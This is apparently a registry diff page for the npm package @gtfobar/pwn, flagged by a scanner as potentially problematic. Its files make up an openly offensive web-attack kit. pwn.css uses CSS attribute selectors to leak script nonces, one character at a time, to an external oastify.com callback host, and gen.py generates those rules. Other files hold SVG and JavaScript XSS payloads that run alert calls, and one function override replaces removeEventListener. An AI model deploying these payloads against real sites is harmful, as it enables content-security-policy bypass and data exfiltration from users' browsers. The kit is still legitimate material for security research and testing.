@gtfobar/pwn 1.0.14
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of @gtfobar/pwn might be problematic. Click here for more details.
- package/dist/black.css +3 -0
- package/dist/pwn.css +41 -0
- package/dist/pwn.html +6 -0
- package/dist/pwn.js +1 -0
- package/dist/pwn.svg +9 -0
- package/gen.py +7 -0
- package/package.json +100 -0
- package/src/index.js +1 -0
- package/webpack.config.js +13 -0
package/dist/black.css
ADDED
package/dist/pwn.css
ADDED
|
@@ -0,0 +1,41 @@
|
|
|
1
|
+
script[nonce=*a] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?a);}
|
|
2
|
+
script[nonce=*b] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?b);}
|
|
3
|
+
script[nonce=*c] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?c);}
|
|
4
|
+
script[nonce=*d] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?d);}
|
|
5
|
+
script[nonce=*e] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?e);}
|
|
6
|
+
script[nonce=*f] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?f);}
|
|
7
|
+
script[nonce=*g] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?g);}
|
|
8
|
+
script[nonce=*h] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?h);}
|
|
9
|
+
script[nonce=*i] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?i);}
|
|
10
|
+
script[nonce=*j] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?j);}
|
|
11
|
+
script[nonce=*k] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?k);}
|
|
12
|
+
script[nonce=*l] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?l);}
|
|
13
|
+
script[nonce=*m] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?m);}
|
|
14
|
+
script[nonce=*n] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?n);}
|
|
15
|
+
script[nonce=*o] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?o);}
|
|
16
|
+
script[nonce=*p] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?p);}
|
|
17
|
+
script[nonce=*q] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?q);}
|
|
18
|
+
script[nonce=*r] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?r);}
|
|
19
|
+
script[nonce=*s] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?s);}
|
|
20
|
+
script[nonce=*t] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?t);}
|
|
21
|
+
script[nonce=*u] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?u);}
|
|
22
|
+
script[nonce=*v] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?v);}
|
|
23
|
+
script[nonce=*w] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?w);}
|
|
24
|
+
script[nonce=*x] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?x);}
|
|
25
|
+
script[nonce=*y] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?y);}
|
|
26
|
+
script[nonce=*z] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?z);}
|
|
27
|
+
script[nonce=*0] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?0);}
|
|
28
|
+
script[nonce=*1] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?1);}
|
|
29
|
+
script[nonce=*2] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?2);}
|
|
30
|
+
script[nonce=*3] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?3);}
|
|
31
|
+
script[nonce=*4] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?4);}
|
|
32
|
+
script[nonce=*5] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?5);}
|
|
33
|
+
script[nonce=*6] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?6);}
|
|
34
|
+
script[nonce=*7] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?7);}
|
|
35
|
+
script[nonce=*8] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?8);}
|
|
36
|
+
script[nonce=*9] { background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?9);}
|
|
37
|
+
|
|
38
|
+
body {
|
|
39
|
+
background-image: url(https://m7u72eegr5mxsiabbdrfl06d74dv1opd.oastify.com/hello-from-css);
|
|
40
|
+
background-color: #000000;
|
|
41
|
+
}
|
package/dist/pwn.html
ADDED
package/dist/pwn.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
alert(1)
|
package/dist/pwn.svg
ADDED
|
@@ -0,0 +1,9 @@
|
|
|
1
|
+
<?xml version="1.0" standalone="no"?>
|
|
2
|
+
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
|
3
|
+
|
|
4
|
+
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
|
|
5
|
+
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
|
|
6
|
+
<script type="text/javascript" nonce="you-are-pwned">
|
|
7
|
+
alert('xss');
|
|
8
|
+
</script>
|
|
9
|
+
</svg>
|
package/gen.py
ADDED
|
@@ -0,0 +1,7 @@
|
|
|
1
|
+
import string
|
|
2
|
+
|
|
3
|
+
for i in string.ascii_lowercase:
|
|
4
|
+
print(f'script[nonce=*{i}] {{ background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?{i});}}')
|
|
5
|
+
|
|
6
|
+
for i in string.digits:
|
|
7
|
+
print(f'script[nonce=*{i}] {{ background: url(https://6krrfyr04pzh52nvox4zykjxkoqfe72w.oastify.com/nonce?{i});}}')
|
package/package.json
ADDED
|
@@ -0,0 +1,100 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "@gtfobar/pwn",
|
|
3
|
+
"version": "1.0.14",
|
|
4
|
+
"main": "dist/pwn.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
|
7
|
+
},
|
|
8
|
+
"author": "",
|
|
9
|
+
"license": "ISC",
|
|
10
|
+
"devDependencies": {
|
|
11
|
+
"webpack": "^5.89.0",
|
|
12
|
+
"webpack-cli": "^5.1.4"
|
|
13
|
+
},
|
|
14
|
+
"dependencies": {
|
|
15
|
+
"acorn": "^8.11.2",
|
|
16
|
+
"acorn-import-assertions": "^1.9.0",
|
|
17
|
+
"ajv": "^6.12.6",
|
|
18
|
+
"ajv-keywords": "^3.5.2",
|
|
19
|
+
"browserslist": "^4.22.2",
|
|
20
|
+
"buffer-from": "^1.1.2",
|
|
21
|
+
"caniuse-lite": "^1.0.30001566",
|
|
22
|
+
"chrome-trace-event": "^1.0.3",
|
|
23
|
+
"clone-deep": "^4.0.1",
|
|
24
|
+
"colorette": "^2.0.20",
|
|
25
|
+
"commander": "^2.20.3",
|
|
26
|
+
"cross-spawn": "^7.0.3",
|
|
27
|
+
"electron-to-chromium": "^1.4.609",
|
|
28
|
+
"enhanced-resolve": "^5.15.0",
|
|
29
|
+
"envinfo": "^7.11.0",
|
|
30
|
+
"es-module-lexer": "^1.4.1",
|
|
31
|
+
"escalade": "^3.1.1",
|
|
32
|
+
"eslint-scope": "^5.1.1",
|
|
33
|
+
"esrecurse": "^4.3.0",
|
|
34
|
+
"estraverse": "^4.3.0",
|
|
35
|
+
"events": "^3.3.0",
|
|
36
|
+
"fast-deep-equal": "^3.1.3",
|
|
37
|
+
"fast-json-stable-stringify": "^2.1.0",
|
|
38
|
+
"fastest-levenshtein": "^1.0.16",
|
|
39
|
+
"find-up": "^4.1.0",
|
|
40
|
+
"flat": "^5.0.2",
|
|
41
|
+
"function-bind": "^1.1.2",
|
|
42
|
+
"glob-to-regexp": "^0.4.1",
|
|
43
|
+
"graceful-fs": "^4.2.11",
|
|
44
|
+
"has-flag": "^4.0.0",
|
|
45
|
+
"hasown": "^2.0.0",
|
|
46
|
+
"import-local": "^3.1.0",
|
|
47
|
+
"interpret": "^3.1.1",
|
|
48
|
+
"is-core-module": "^2.13.1",
|
|
49
|
+
"is-plain-object": "^2.0.4",
|
|
50
|
+
"isexe": "^2.0.0",
|
|
51
|
+
"isobject": "^3.0.1",
|
|
52
|
+
"jest-worker": "^27.5.1",
|
|
53
|
+
"json-parse-even-better-errors": "^2.3.1",
|
|
54
|
+
"json-schema-traverse": "^0.4.1",
|
|
55
|
+
"kind-of": "^6.0.3",
|
|
56
|
+
"loader-runner": "^4.3.0",
|
|
57
|
+
"locate-path": "^5.0.0",
|
|
58
|
+
"merge-stream": "^2.0.0",
|
|
59
|
+
"mime-db": "^1.52.0",
|
|
60
|
+
"mime-types": "^2.1.35",
|
|
61
|
+
"neo-async": "^2.6.2",
|
|
62
|
+
"node-releases": "^2.0.14",
|
|
63
|
+
"p-limit": "^2.3.0",
|
|
64
|
+
"p-locate": "^4.1.0",
|
|
65
|
+
"p-try": "^2.2.0",
|
|
66
|
+
"path-exists": "^4.0.0",
|
|
67
|
+
"path-key": "^3.1.1",
|
|
68
|
+
"path-parse": "^1.0.7",
|
|
69
|
+
"picocolors": "^1.0.0",
|
|
70
|
+
"pkg-dir": "^4.2.0",
|
|
71
|
+
"punycode": "^2.3.1",
|
|
72
|
+
"randombytes": "^2.1.0",
|
|
73
|
+
"rechoir": "^0.8.0",
|
|
74
|
+
"resolve": "^1.22.8",
|
|
75
|
+
"resolve-cwd": "^3.0.0",
|
|
76
|
+
"resolve-from": "^5.0.0",
|
|
77
|
+
"safe-buffer": "^5.2.1",
|
|
78
|
+
"schema-utils": "^3.3.0",
|
|
79
|
+
"serialize-javascript": "^6.0.1",
|
|
80
|
+
"shallow-clone": "^3.0.1",
|
|
81
|
+
"shebang-command": "^2.0.0",
|
|
82
|
+
"shebang-regex": "^3.0.0",
|
|
83
|
+
"source-map": "^0.6.1",
|
|
84
|
+
"source-map-support": "^0.5.21",
|
|
85
|
+
"supports-color": "^8.1.1",
|
|
86
|
+
"supports-preserve-symlinks-flag": "^1.0.0",
|
|
87
|
+
"tapable": "^2.2.1",
|
|
88
|
+
"terser": "^5.26.0",
|
|
89
|
+
"terser-webpack-plugin": "^5.3.9",
|
|
90
|
+
"undici-types": "^5.26.5",
|
|
91
|
+
"update-browserslist-db": "^1.0.13",
|
|
92
|
+
"uri-js": "^4.4.1",
|
|
93
|
+
"watchpack": "^2.4.0",
|
|
94
|
+
"webpack-merge": "^5.10.0",
|
|
95
|
+
"webpack-sources": "^3.2.3",
|
|
96
|
+
"which": "^2.0.2",
|
|
97
|
+
"wildcard": "^2.0.1"
|
|
98
|
+
},
|
|
99
|
+
"description": ""
|
|
100
|
+
}
|
package/src/index.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
exports.removeEventListener = function () {alert(1);}
|
|
@@ -0,0 +1,13 @@
|
|
|
1
|
+
const path = require('path');
|
|
2
|
+
|
|
3
|
+
module.exports = {
|
|
4
|
+
mode: 'development',
|
|
5
|
+
entry: './src/index.js',
|
|
6
|
+
output: {
|
|
7
|
+
path: path.resolve(__dirname, 'dist'),
|
|
8
|
+
filename: 'pwn.css',
|
|
9
|
+
library: "pwn",
|
|
10
|
+
libraryTarget: 'umd',
|
|
11
|
+
globalObject: 'this'
|
|
12
|
+
},
|
|
13
|
+
};
|